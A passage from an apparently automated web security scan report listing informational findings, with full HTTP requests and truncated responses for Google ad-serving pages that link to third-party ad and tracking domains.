ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.284. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658388940&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658388942&frm=1&adk=2614322350&ga_vid=218077159.1303658389&ga_sid=1303658389&ga_hid=1485847521&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4179

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_a.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3DConcur.com/Breeze_FreeTrial%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNETq6DKqWQ9Dclz8BLOOzJlCWvySA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.285. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680132&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662132389&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303662132395&frm=1&adk=2614322350&ga_vid=561553089.1303662132&ga_sid=1303662132&ga_hid=155764284&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:22:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14709

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.Fool.com%26adT%3DMotley%2BFool%2BStock%2BAdvisor%26adU%3Dwww.Booksurge.com%26adT%3DAmazon%2Bself%2Bpublishing%26adU%3DAmazonRiverCruises.com%26adT%3DAmazon%2BRiver%2BCruises%26gl%3DUS&amp;usg=AFQjCNHuqPy8ypl1GgAmKYnfsoRt2SOH3A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.286. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679650&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661650965&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661650971&frm=1&adk=2614322350&ga_vid=1627517092.1303661651&ga_sid=1303661651&ga_hid=784303803&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:14:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919926&ahcid=1089795&bimpd=AwUq_E6hLJos5E2vUu9cvm5XXQ3Gi9UxyWJGLPxIOdg3DKQL-6lWaDJU64H2wzEU7W2K64N2tBfHSl_Y8FFs6q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BGRWooZCDwsmwTGoGkFOSS7rm-0eH79R-ZPf16jLVxwKlgHBzIj8H9loLjUdnhyPRbeOfpTS-1mTS87A111rNlAKvcwxugsSnr1idp-aByS3gU2xBm3QHaMdsIoCKhXuXyRKhKXGgpt9ON4nDHaJZDdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ynMX-MZsvrLPipeckFJrph-KwPTremxOkOu-NAr5rfRwQaJQmyFM1l4x-S8oOkTR0WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPelbYMfxTGLhmokb_LiHMdI07NjMOSxqJylcziAJzN-mGX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfqXWX5Skjm4gruJ9NdrOrBjoByWRKoQ3oF0AT_2N-Em_gjdkSW0JhvnWXPD46RI-8Pt_T370WDWWY1SqEwEJwbhnBOUR0uKXwLnlzhRcF-z1AMzSpd4HVsiSQfgdEzLWQlA9y0FUzpqtDC0K6uSmpOaAE0HQb-VqGycWmukn0nOb6o408BxR9uazB8jKSDnLvk&acp=TbRMUAAATmwK5TqGOphVbM7Q0PHrU_Bb0BEJ9A&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtBH9UEy0TeycAYb1lAfsquHUA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtxau1KJnQa24ScAaMD_bbFM6MNKyg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.287. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680822&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662822459&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303662822465&frm=1&adk=2614322350&ga_vid=1439206740.1303662822&ga_sid=1303662822&ga_hid=770846980&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:33:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DManage%2BBlade%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26adU%3Dwww.quietpcusa.com%26adT%3DXRackPro2%2B25U%2BRackmount%26gl%3DUS&amp;usg=AFQjCNEFlVCqmRWHQunkAtAjUjDFcBB0JA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.288. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681966&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663966906&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663966912&frm=1&adk=2614322350&ga_vid=342315721.1303663967&ga_sid=1303663967&ga_hid=947835618&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:52:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26adU%3DPeru.travel%26adT%3DHotels%2B%2526amp%253B%2BResorts%2Bat%2BPeru%26gl%3DUS&amp;usg=AFQjCNGLOsw80UEZXFTOaYHKP2sUIthEWQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.289. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680702&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662702414&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303662702426&frm=1&adk=2614322350&ga_vid=276751918.1303662702&ga_sid=1303662702&ga_hid=951969942&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:31:40 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26adU%3Dwww.proaudiostash.com%26adT%3D19%2526quot%253B%2BLaptop%2BDrawer%26gl%3DUS&amp;usg=AFQjCNF0KFk-sC9PXO1WFevnCR3GuARPgQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.290. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681583&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663583737&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663583742&frm=1&adk=2614322350&ga_vid=1680536228.1303663584&ga_sid=1303663584&ga_hid=581255919&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=28 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:46:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2241

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
rWFooeVRDX2hNa3k1OVhRTUx1SHhHTHpnTWxqNjREUWJPdUFtMk1sQmYwWYABlfD3yQ6oAaazB7ABAQ;redirect=http%3A%2F%2Fwww.regonline.com%2F%3Futm_source%3Dquantcast%26utm_medium%3Ddisplay%26utm_campaign%3DQC_201104v2"><img src="http://content.quantserve.com/ads/regonline/Regonline_Q2-11.20110419.160x600.v2.gif" style="border-style: none"/></A><img src="http://exch.quantserve.com/pixel/p-b7FzQys84a9fI.gif?media=ad&p=TbRT3AAM_FsK7F7C1nhBToPk2L45LcmCEAIY1g&r=2097017803&rand=16026&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2&rtbip=63.251.90.151&rtbdata2=EAAaD1JlZ29ubGluZV9RMi0xMSDQCyiEGTD_3B46M2h0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocEIHCK_GBxD1AUoHCP66BhDrWFooeVRDX2hNa3k1OVhRTUx1SHhHTHpnTWxqNjREUWJPdUFtMk1sQmYwWYABlfD3yQ6oAaazB7ABAQ" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

23.291. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502354&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502359&frm=1&adk=513358139&ga_vid=2102368488.1303658502&ga_sid=1303658502&ga_hid=1386538034&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1365

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.292. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

